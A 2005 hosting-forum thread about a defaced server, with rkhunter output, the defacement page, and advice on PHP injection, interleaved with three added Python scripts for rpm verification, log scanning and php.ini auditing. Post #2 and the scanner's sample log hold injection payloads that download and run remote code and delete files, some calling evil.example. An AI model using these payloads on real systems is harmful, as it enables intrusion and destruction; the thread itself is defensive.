Thread: server hacked ... advice needed
-
10-31-2005, 04:13 PM #1 Web Hosting Guru (Join Date: Jun 2004, Posts: 308)
server hacked ... advice needed
My server hosting company sent me an email telling me my website may have been defaced and that I should investigate my server for possible compromise as soon as possible. The defaced website is:
www.AAAAAAAA.com/scgi-bin
I found a file named indrx.php and the content of it is:
Code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Hacked By CyBeRLORD</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-9">
<style type="text/css">
<!--
body,td,th { color: #FFFFFF; }
body { background-color: #000000; }
.style1 {font-size: 36px}
a:link { color: #FFFFFF; }
a:visited { color: #000000; }
-->
</style>
</head>
<body>
<table width="984" border="0">
<tr>
<td height="98"> </td>
<td align="center"><img src="http://lejyoner21.sitemynet.com/11.jpg" width="323" height="349"> </td>
<td> </td>
</tr>
<tr>
<td height="114"> </td>
<td align="center"><span class="style1">Hacked By CyBeRLORD Owns Your System </span></td>
<td align="center"><span class="style1">cyberlord@hiperturk.com </span></td>
<td> </td>
</tr>
<tr>
<td height="216"> </td>
<td align="center"><span class="style1"><a href="http://biyo.5gigs.com">www.cyber-soldiers.org and www.biyo.tk</a></span></td>
<td> </td>
</tr>
</table>
</body>
</html>
Code:
Checking binaries
* Selftests
Strings (command) [ OK ]
* System tools
Performing 'known good' check...
/bin/cat [ OK ]
/bin/chmod [ OK ]
/bin/chown [ OK ]
/bin/dmesg [ BAD ]
/bin/egrep [ OK ]
/bin/env [ OK ]
/bin/fgrep [ OK ]
/bin/grep [ OK ]
/bin/kill [ BAD ]
/bin/login [ BAD ]
/bin/ls [ OK ]
/bin/mount [ BAD ]
/bin/netstat [ OK ]
/bin/ps [ OK ]
/bin/su [ OK ]
/sbin/chkconfig [ OK ]
/sbin/depmod [ OK ]
/sbin/ifconfig [ OK ]
/sbin/init [ OK ]
/sbin/insmod [ OK ]
/sbin/modinfo [ OK ]
/sbin/runlevel [ OK ]
/sbin/sysctl [ OK ]
/sbin/syslogd [ OK ]
/usr/bin/file [ OK ]
/usr/bin/find [ OK ]
/usr/bin/groups [ OK ]
/usr/bin/kill [ OK ]
/usr/bin/killall [ OK ]
/usr/bin/lsattr [ OK ]
/usr/bin/pstree [ OK ]
/usr/bin/sha1sum [ OK ]
/usr/bin/stat [ OK ]
/usr/bin/users [ OK ]
/usr/bin/w [ OK ]
/usr/bin/watch [ OK ]
/usr/bin/who [ OK ]
/usr/bin/whoami [ OK ]
--------------------------------------------------------------------------------
Rootkit Hunter found some bad or unknown hashes. This can be happen due replaced binaries or updated packages (which give other hashes). Be sure your hashes are fully updated (rkhunter --update). If you're in doubt about these hashes, contact the author (fill in the contact form).

Check rootkits
* Default files and directories
Rootkit '55808 Trojan - Variant A'... [ OK ]
ADM Worm... [ OK ]
Rootkit 'AjaKit'... [ OK ]
Rootkit 'aPa Kit'... [ OK ]
Rootkit 'Apache Worm'... [ OK ]
Rootkit 'Ambient (ark) Rootkit'... [ OK ]
Rootkit 'Balaur Rootkit'... [ OK ]
Rootkit 'BeastKit'... [ OK ]
Rootkit 'beX2'... [ OK ]
Rootkit 'BOBKit'... [ OK ]
Rootkit 'CiNIK Worm (Slapper.B variant)'... [ OK ]
Rootkit 'Danny-Boy's Abuse Kit'... [ OK ]
Rootkit 'Devil RootKit'... [ OK ]
Rootkit 'Dica'... [ OK ]
Rootkit 'Dreams Rootkit'... [ OK ]
Rootkit 'Duarawkz'... [ OK ]
Rootkit 'Flea Linux Rootkit'... [ OK ]
Rootkit 'FreeBSD Rootkit'... [ OK ]
Rootkit '****`it Rootkit'... [ OK ]
Rootkit 'GasKit'... [ OK ]
Rootkit 'Heroin LKM'... [ OK ]
Rootkit 'HjC Kit'... [ OK ]
Rootkit 'ignoKit'... [ OK ]
Rootkit 'ImperalsS-FBRK'... [ OK ]
Rootkit 'Irix Rootkit'... [ OK ]
Rootkit 'Kitko'... [ OK ]
Rootkit 'Knark'... [ OK ]
Rootkit 'Li0n Worm'... [ OK ]
Rootkit 'Lockit / LJK2'... [ OK ]
Rootkit 'MRK'... [ OK ]
Rootkit 'Ni0 Rootkit'... [ OK ]
Rootkit 'RootKit for SunOS / NSDAP'... [ OK ]
Rootkit 'Optic Kit (Tux)'... [ OK ]
Rootkit 'Oz Rootkit'... [ OK ]
Rootkit 'Portacelo'... [ OK ]
Rootkit 'R3dstorm Toolkit'... [ OK ]
Rootkit 'RH-Sharpe's rootkit'... [ OK ]
Rootkit 'RSHA's rootkit'... [ OK ]
Sebek LKM [ OK ]
Rootkit 'Scalper Worm'... [ OK ]
Rootkit 'Shutdown'... [ OK ]
Rootkit 'SHV4'... [ OK ]
Rootkit 'SHV5'... [ OK ]
Rootkit 'Sin Rootkit'... [ OK ]
Rootkit 'Slapper'... [ OK ]
Rootkit 'Sneakin Rootkit'... [ OK ]
Rootkit 'Suckit Rootkit'... [ OK ]
Rootkit 'SunOS Rootkit'... [ OK ]
Rootkit 'Superkit'... [ OK ]
Rootkit 'TBD (Telnet BackDoor)'... [ OK ]
Rootkit 'TeLeKiT'... [ OK ]
Rootkit 'T0rn Rootkit'... [ OK ]
Rootkit 'Trojanit Kit'... [ OK ]
Rootkit 'Tuxtendo'... [ OK ]
Rootkit 'URK'... [ OK ]
Rootkit 'VcKit'... [ OK ]
Rootkit 'Volc Rootkit'... [ OK ]
Rootkit 'X-Org SunOS Rootkit'... [ OK ]
Rootkit 'zaRwT.KiT Rootkit'... [ OK ]
* Suspicious files and malware
Scanning for known rootkit strings [ OK ]
Scanning for known rootkit files [ OK ]
Testing running processes... [ OK ]
Miscellaneous Login backdoors [ OK ]
Miscellaneous directories [ OK ]
Software related files [ OK ]
Sniffer logs [ OK ]
* Trojan specific characteristics
shv4
Checking /etc/rc.d/rc.sysinit
Test 1 [ Clean ]
Test 2 [ Clean ]
Test 3 [ Clean ]
Checking /etc/inetd.conf [ Clean ]
Checking /etc/xinetd.conf [ Clean ]
* Suspicious file properties
chmod properties
Checking /bin/ps [ Clean ]
Checking /bin/ls [ Clean ]
Checking /usr/bin/w [ Clean ]
Checking /usr/bin/who [ Clean ]
Checking /bin/netstat [ Clean ]
Checking /bin/login [ Clean ]
Script replacements
Checking /bin/ps [ Clean ]
Checking /bin/ls [ Clean ]
Checking /usr/bin/w [ Clean ]
Checking /usr/bin/who [ Clean ]
Checking /bin/netstat [ Clean ]
Checking /bin/login [ Clean ]
* OS dependant tests
Linux
Checking loaded kernel modules... [ OK ]
Checking files attributes [ OK ]
Checking LKM module path [ OK ]

Networking
* Check: frequently used backdoors
warning, got bogus tcp line.
Port 2001: Scalper Rootkit [ OK ]
Port 2006: CB Rootkit [ OK ]
Port 2128: MRK [ OK ]
Port 14856: Optic Kit (Tux) [ OK ]
Port 47107: T0rn Rootkit [ OK ]
Port 60922: zaRwT.KiT [ OK ]
* Interfaces
Scanning for promiscuous interfaces [ OK ]

System checks
* Allround tests
Checking hostname... Found. Hostname is host.indexsignal.com
Checking for passwordless user accounts... OK
Checking for differences in user accounts... OK. No changes.
Checking for differences in user groups... OK. No changes.
Checking boot.local/rc.local file...
- /etc/rc.local [ OK ]
- /etc/rc.d/rc.local [ OK ]
- /usr/local/etc/rc.local [ Not found ]
- /usr/local/etc/rc.d/rc.local [ Not found ]
- /etc/conf.d/local.start [ Not found ]
- /etc/init.d/boot.local [ Not found ]
Checking rc.d files...
Processing ........................................
Result rc.d files check [ OK ]
Checking history files
Bourne Shell [ OK ]
* Filesystem checks
Checking /dev for suspicious files... [ OK ]
Scanning for hidden files...

Application advisories
* Application scan
Checking Apache2 modules ... [ Not found ]
Checking Apache configuration ... [ OK ]
* Application version scan
- Exim MTA 4.52 [ OK ]
- GnuPG 1.2.1 [ Old or patched version ]
- Apache [unknown] [ OK ]
- Bind DNS 9.2.4 [ OK ]
- OpenSSL 0.9.7a [ Old or patched version ]
- PHP 4.3.11 [ OK ]
- PHP 4.3.11 [ OK ]
- Procmail MTA 3.22 [ OK ]
- OpenSSH 3.6.1p2 [ Old or patched version ]

Security advisories
* Check: Groups and Accounts
Searching for /etc/passwd... [ Found ]
Checking users with UID '0' (root)... [ OK ]
* Check: SSH
Searching for sshd_config... Found /etc/ssh/sshd_config
Checking for allowed root login... Watch out Root login possible. Possible risk!
info: Hint: See logfile for more information about this issue
Checking for allowed protocols... [ OK (Only SSH2 allowed) ]
* Check: Events and Logging
Search for syslog configuration... [ OK ]
Checking for running syslog slave... [ OK ]
Checking for logging to remote system... [ OK (no remote logging) ]

---------------------------- Scan results ----------------------------
MD5
MD5 compared: 115
Incorrect MD5 checksums: 4
File scan
Scanned files: 342
Possible infected files: 0
Application scan
Vulnerable applications: 3
Scanning took 672 seconds
I did my best to secure my server, following all the advice mentioned on the WebHostingTalk forum for the past 2 years, and I have been updating everything on my box to secure it.
There is only my personal website on this server, so I am the only user.
How did that hacker get into my server?
The only thing I remember that might have caused this is installing a PHP mailing list 2 weeks ago.
And do I need to reformat my server? I hope not.
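Added example, not code from the thread: the four [ BAD ] entries in the rkhunter report above can mean either a replaced binary or a vendor update that rkhunter's hash set does not know yet, and on a Red Hat box the way to tell them apart is to verify the file against the RPM database (`rpm -Vf /bin/login`) and read the flag columns. The script below does that reading for the four flagged paths; the `rpm -V` output in SAMPLE_RPM_V is constructed for illustration, and the verdict wording is this example's own. Caveat: `rpm -V` trusts the rpm binary and the rpm database, both of which a rootkit can alter too, so for a decision that matters verify against the vendor's original package file (`rpm -Vp <package>.rpm`) or against hashes taken from a known-clean install.

```python
"""Interpret `rpm -V` output for binaries that rkhunter reported as [ BAD ].

Added example; not code from the original thread. The `rpm -V` lines in
SAMPLE_RPM_V are constructed for illustration.
"""

# rkhunter's 'known good' check flagged these four paths in the thread.
BAD_BINARIES = ["/bin/dmesg", "/bin/kill", "/bin/login", "/bin/mount"]

# `rpm -V` prints one line per file that differs from the package database:
# an 8-column flag field (a '.' means that test passed) followed by the path.
FLAG_MEANING = {
    "S": "size differs",
    "M": "mode differs",
    "5": "digest differs",
    "D": "device number differs",
    "L": "symlink target differs",
    "U": "owner differs",
    "G": "group differs",
    "T": "mtime differs",
}
# Flags that mean the file *contents* changed, not just its metadata.
CONTENT_FLAGS = set("S5L")

# Constructed sample: /bin/login has a different size and digest (replaced),
# /bin/dmesg only has a new mtime; /bin/kill and /bin/mount verify clean and
# therefore do not appear at all.
SAMPLE_RPM_V = """S.5....T    /bin/login
.......T    /bin/dmesg
"""


def parse_rpm_verify(output):
    """Return {path: set_of_failed_flags} or {path: "missing"} per reported file.

    Files that verify clean produce no output line and are absent from the map.
    """
    verified = {}
    for line in output.splitlines():
        parts = line.split()
        if not parts:
            continue
        path = parts[-1]
        if parts[0] == "missing":          # rpm prints "missing    /path"
            verified[path] = "missing"
            continue
        # Keep only failed tests; '.' is pass, '?' means the test could not run.
        verified[path] = {c for c in parts[0] if c not in ".?"}
    return verified


def classify(bad_binaries, verify_output):
    """Map each rkhunter-flagged path to a verdict based on its `rpm -V` flags."""
    verified = parse_rpm_verify(verify_output)
    verdicts = {}
    for path in bad_binaries:
        flags = verified.get(path)
        if flags is None:
            verdicts[path] = "matches package database (likely an updated package not yet in rkhunter's hash set)"
        elif flags == "missing":
            verdicts[path] = "file missing from disk"
        elif flags & CONTENT_FLAGS:
            verdicts[path] = "REPLACED: " + ", ".join(FLAG_MEANING.get(f, f) for f in sorted(flags))
        else:
            verdicts[path] = "metadata only: " + ", ".join(FLAG_MEANING.get(f, f) for f in sorted(flags))
    return verdicts


if __name__ == "__main__":
    for path, verdict in classify(BAD_BINARIES, SAMPLE_RPM_V).items():
        print(f"{path:12} {verdict}")
```

To run it against the real box, feed it the output of `rpm -Vf /bin/dmesg /bin/kill /bin/login /bin/mount` instead of SAMPLE_RPM_V; a "REPLACED" verdict on /bin/login is the point at which the hosting company's "no OS reload needed" answer stops being safe to rely on.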
-
10-31-2005, 04:31 PM #2 Web Hosting Master (Join Date: Mar 2002, Location: St. Louis, MO, Posts: 1,379)
While it doesn't necessarily appear your system has been rooted, more than likely what was used was some form of PHP injection or some other exploit in a script, something like this as an example:
somescript.php?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://somesite.com/.it/in;perl%20in;
Wouldn't hurt to perform other audits on your system anyway. Look through your logs; once you figure out how it was done you can install or disable something to further prevent it, like mod_security.
-
10-31-2005, 04:43 PM #3 Web Hosting Guru (Join Date: Jun 2004, Posts: 308)
I did ( last | more ) to check if someone else had SSHed into my server, but I found nothing... my IP address was the only one logging into my server in October.
-
10-31-2005, 05:03 PM #4 Web Hosting Guru (Join Date: Jun 2004, Posts: 308)
I sent my box's hosting company an email asking them if an OS reload was needed, and the reply was:
(( An OS reload is not necessary in this case, it would seem you have done enough to help secure the server. The php email list script was the most likely cause of this if you have not had problems recently ))
I will take a look at that PHP email list script's code and see if I find something in it.
-
10-31-2005, 05:11 PM #5 Web Hosting Master (Join Date: Mar 2002, Location: St. Louis, MO, Posts: 1,379)
Run this, see if you get anything:
for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;
-
10-31-2005, 05:23 PM #6 WHT Addict (Join Date: Nov 2003, Location: Oklahoma, Posts: 146)
Just wondering if you are running cPanel? Either way, I would recommend you use the cPanel script to secure your tmp folder, or find the procedure to do this.
-
10-31-2005, 05:50 PM #7 Web Hosting Master (Join Date: Apr 2003, Location: NC, Posts: 3,093)
From what you posted your server does not look rooted. One very important thing to keep updated is the kernel. If you keep your kernel updated you are going to have a lot less of a chance of getting rooted by these annoying PHP injection attacks.
If possible, limit your available PHP functions and it will help with these sorts of attacks.
John W, CISSP, C|EH
MS Information Security and Assurance
ITEagleEye.com - Server Administration and Security
Yawig.com - Managed VPS and Dedicated Servers with VIP Service
-
10-31-2005, 05:54 PM #8 Web Hosting Guru (Join Date: Jun 2004, Posts: 308)
Originally Posted by DigiCrime
Do you mean # grep [ filename ] for every file in /usr/local/apache/domlogs/?
or grep "wget" $files; done;[ filename ]
Because I am getting syntax errors.
-
10-31-2005, 05:56 PM #9 Web Hosting Master (Join Date: Apr 2003, Location: NC, Posts: 3,093)
Originally Posted by xmlxp
egrep wget /usr/local/apache/domlogs/*
But keep in mind there are more ways than just wget to put a script on your server.
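The payload DigiCrime quoted in post #2 and eth00's point above that wget is not the only way to drop a script both argue for scanning the decoded request rather than grepping the raw log for one word: `%7c` is `|`, `%20` is a space, and the tool name itself can be hex-encoded so that `egrep wget` never matches. The script below is an added example, not code from the thread or from cPanel. It parses Apache common/combined log lines, URL-decodes the request target, and flags shell metacharacters in the query string, downloader or interpreter names, remote URLs passed as parameters, and moves into /tmp; it also pulls out the URLs a payload tries to fetch, which are the indicators to block and to look for under /tmp. The log lines, IP addresses and the evil.example hostname are constructed; somesite.com is the placeholder from the thread's own example payload.

```python
"""Scan Apache access-log lines for injection payloads after URL-decoding them.

Added example; not code from the original thread. SAMPLE_LOG is constructed;
the IPs and the evil.example hostname are made up (somesite.com is the
placeholder used in the thread's own example payload).
"""
import re
import sys
from urllib.parse import unquote_plus

# Apache common/combined log format: ip ident user [time] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3}) (?P<bytes>\S+)'
)

# Rules run against the *decoded* request target. (name, regex)
RULES = [
    # ; | ` or $( inside the query string: command separators for a shell
    ("shell metachar in query", re.compile(r'\?\S*(?:[;|`]|\$\()')),
    # Something that fetches or runs code, followed by an argument
    ("downloader or interpreter", re.compile(r'\b(?:wget|curl|fetch|lynx|GET|perl|php)\b[ \t]')),
    # A URL handed to a parameter: include($configdir . '/x.php') style remote inclusion
    ("remote URL in parameter", re.compile(r'=(?:https?|ftp)://', re.I)),
    # Working in a world-writable directory
    ("uses /tmp or /dev/shm", re.compile(r'\b(?:cd|cp|mv|chmod)[ \t]+/(?:tmp|var/tmp|dev/shm)\b')),
]

URL_RE = re.compile(r'(?:https?|ftp)://[^\s;|&`\'"]+', re.I)

SAMPLE_LOG = [
    # 1: the payload shape quoted in post #2
    '1.2.3.4 - - [29/Oct/2005:03:12:45 +0000] "GET /scgi-bin/somescript.php?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://somesite.com/.it/in;perl%20in; HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    # 2: remote file inclusion, no wget anywhere in the line
    '5.6.7.8 - - [29/Oct/2005:03:13:10 +0000] "GET /scgi-bin/somescript.php?configdir=http://evil.example/cmd.txt? HTTP/1.1" 200 611 "-" "libwww-perl/5.79"',
    # 3: ordinary traffic
    '9.9.9.9 - - [29/Oct/2005:03:14:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    # 4: same attack with the tool name hex-encoded: grep wget / grep curl on the raw log both miss it
    '10.0.0.1 - - [29/Oct/2005:03:15:00 +0000] "GET /scgi-bin/somescript.php?configdir=%7c%63%75%72%6c%20http://evil.example/x HTTP/1.1" 200 300 "-" "-"',
]


def parse_line(line):
    """Return the log fields plus a URL-decoded 'decoded' target, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded"] = unquote_plus(rec["target"])   # %7c -> '|', %20 and '+' -> ' '
    return rec


def scan_line(line):
    """Names of the rules that fire on one log line; [] when clean or unparseable."""
    rec = parse_line(line)
    if rec is None:
        return []
    return [name for name, rx in RULES if rx.search(rec["decoded"])]


def fetched_urls(decoded_target):
    """URLs the payload tries to pull in: the things to block and to look for in /tmp."""
    return URL_RE.findall(decoded_target)


def scan_log(lines):
    """Return [(line_no, client_ip, decoded_target, [rule names])] for suspicious lines."""
    hits = []
    for n, line in enumerate(lines, 1):
        reasons = scan_line(line)
        if reasons:
            rec = parse_line(line)
            hits.append((n, rec["ip"], rec["decoded"], reasons))
    return hits


if __name__ == "__main__":
    # With no arguments, run over the constructed sample; otherwise over the given log files.
    if len(sys.argv) > 1:
        for path in sys.argv[1:]:
            with open(path, errors="replace") as fh:
                for n, ip, decoded, reasons in scan_log(fh):
                    print(f"{path}:{n} {ip} {', '.join(reasons)}\n    {decoded}")
    else:
        for n, ip, decoded, reasons in scan_log(SAMPLE_LOG):
            print(f"line {n} {ip} {', '.join(reasons)}\n    {decoded}\n    fetches: {fetched_urls(decoded)}")
```

On a cPanel box the call would be `python scan_domlogs.py /usr/local/apache/domlogs/*`, which replaces the `for files in ...; do grep "wget" $files; done` loop from post #5 and catches line 4 of the sample, where the raw log contains neither "wget" nor "curl". A payload that arrives in a POST body never appears in the access log at all, so an empty result from either method is not proof that nothing came in through the web server.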
-
10-31-2005, 05:58 PM #10 Web Hosting Guru (Join Date: Jun 2004, Posts: 308)
Originally Posted by rhenderson
WHM 10.6.0 cPanel 10.8.0-S59
RedHat Enterprise 3 i686 - WHM X v3.1.0
and did all the necessary security tweaks needed for cPanel.
-
10-31-2005, 06:11 PM #11 Web Hosting Guru (Join Date: Jun 2004, Posts: 308)
Originally Posted by eth00
PHP open_basedir protection is enabled.
PHP safe mode is on.
And I did everything in here:
http://www.hostinglife.com/security.php
Where can I read about these annoying PHP injection attacks?
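open_basedir and safe_mode (this post) and "limit your available php functions" (post #7) are all php.ini settings, and the one that actually stops a `|wget ...;perl in` payload is disable_functions: with system(), exec(), shell_exec(), passthru(), popen() and proc_open() disabled there is nothing for the injected string to run through (disabling shell_exec also disables the backtick operator). The script below is an added example, not from the thread or from any of the linked guides; it audits a php.ini text for that list plus the settings that matter for remote inclusion and information leaks. WEAK_INI and HARDENED_INI are constructed fragments, not the poster's real configuration, and the "built-in default" values assumed for absent keys are PHP 4.3's. Caveat: safe_mode and open_basedir are not security boundaries (safe_mode was removed in PHP 5.4), and disable_functions only helps if every command-execution function is actually listed.

```python
"""Audit php.ini settings relevant to the kind of injection discussed in the thread.

Added example; not code from the original thread. WEAK_INI and HARDENED_INI are
constructed fragments, not the poster's real configuration.
"""

# PHP functions that hand a string to a shell or spawn a process. If any of
# these stays callable, a `configdir=|wget ...;perl in` style payload has
# something to run through. Disabling shell_exec also disables the backtick operator.
EXEC_FUNCTIONS = {"system", "exec", "shell_exec", "passthru", "popen", "proc_open", "dl"}

WEAK_INI = """\
[PHP]
engine = On
safe_mode = On
open_basedir = /home/user/public_html:/tmp
disable_functions =
allow_url_fopen = On
register_globals = On
expose_php = On
display_errors = On
"""

HARDENED_INI = """\
[PHP]
engine = On
safe_mode = On
open_basedir = /home/user/public_html:/tmp
; everything that spawns a process; escapeshellarg/escapeshellcmd are not in this list
disable_functions = system,exec,shell_exec,passthru,popen,proc_open,dl
allow_url_fopen = Off
register_globals = Off
expose_php = Off
display_errors = Off
log_errors = On
"""


def parse_php_ini(text):
    """Return {key: value} from php.ini text; ';' starts a comment, last assignment wins."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def is_on(value):
    """php.ini booleans: 1/On/True/Yes are on, anything else is off."""
    return value.strip().lower() in ("1", "on", "true", "yes")


def disabled_functions(settings):
    """Set of function names listed in disable_functions (comma separated)."""
    return {f.strip().lower() for f in settings.get("disable_functions", "").split(",") if f.strip()}


def audit_php_ini(text):
    """Return a list of findings; an empty list means every check passed."""
    s = parse_php_ini(text)
    findings = []
    still_callable = sorted(EXEC_FUNCTIONS - disabled_functions(s))
    if still_callable:
        findings.append("disable_functions leaves command execution callable: " + ",".join(still_callable))
    if not s.get("open_basedir"):
        findings.append("open_basedir unset: scripts can open any file the web server user can read")
    # Defaults below are PHP 4.3's built-in values when the key is absent (assumption).
    if is_on(s.get("allow_url_fopen", "On")):
        findings.append("allow_url_fopen=On: include()/fopen() will fetch http:// and ftp:// URLs (remote file inclusion)")
    if is_on(s.get("register_globals", "Off")):
        findings.append("register_globals=On: request parameters become PHP variables")
    if is_on(s.get("expose_php", "On")):
        findings.append("expose_php=On: PHP version advertised in the X-Powered-By header")
    if is_on(s.get("display_errors", "On")):
        findings.append("display_errors=On: error text (paths, queries) is sent to the client")
    return findings


if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(f"{name}:")
        for finding in audit_php_ini(ini) or ["no findings"]:
            print("  -", finding)
```

Point it at the live file with `audit_php_ini(open("/usr/local/lib/php.ini").read())` (the path is cPanel's usual one; check `php -i | grep php.ini` if in doubt). The weak fragment passes the open_basedir check and still reports five findings, which is the situation described in this post: open_basedir and safe_mode on, but every shell-spawning function still callable and remote URLs still openable.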
-
10-31-2005, 06:11 PM #12 WHT Addict (Join Date: Nov 2003, Location: Oklahoma, Posts: 146)
Originally Posted by xmlxp
Good Luck
-
10-31-2005, 06:14 PM #13 Web Hosting Guru (Join Date: Jun 2004, Posts: 308)
Originally Posted by eth00
root@host [~]# egrep wget /usr/local/apache/domlogs/*
root@host [~]#
-
10-31-2005, 06:21 PM #14 Web Hosting Master (Join Date: Mar 2002, Location: St. Louis, MO, Posts: 1,379)
Originally Posted by xmlxp
-
10-31-2005, 06:25 PM #15 Web Hosting Guru (Join Date: Jun 2004, Posts: 308)
Originally Posted by DigiCrime
-bash: syntax error near unexpected token `do'
-
10-31-2005, 06:54 PM #16 Web Hosting Master (Join Date: Mar 2002, Location: St. Louis, MO, Posts: 1,379)
Code:for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;
-
10-31-2005, 07:02 PM #17 Web Hosting Guru (Join Date: Jun 2004, Posts: 308)
Originally Posted by DigiCrime
Code:root@host [~]# for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;
Last edited by XMLxp; 10-31-2005 at 07:12 PM.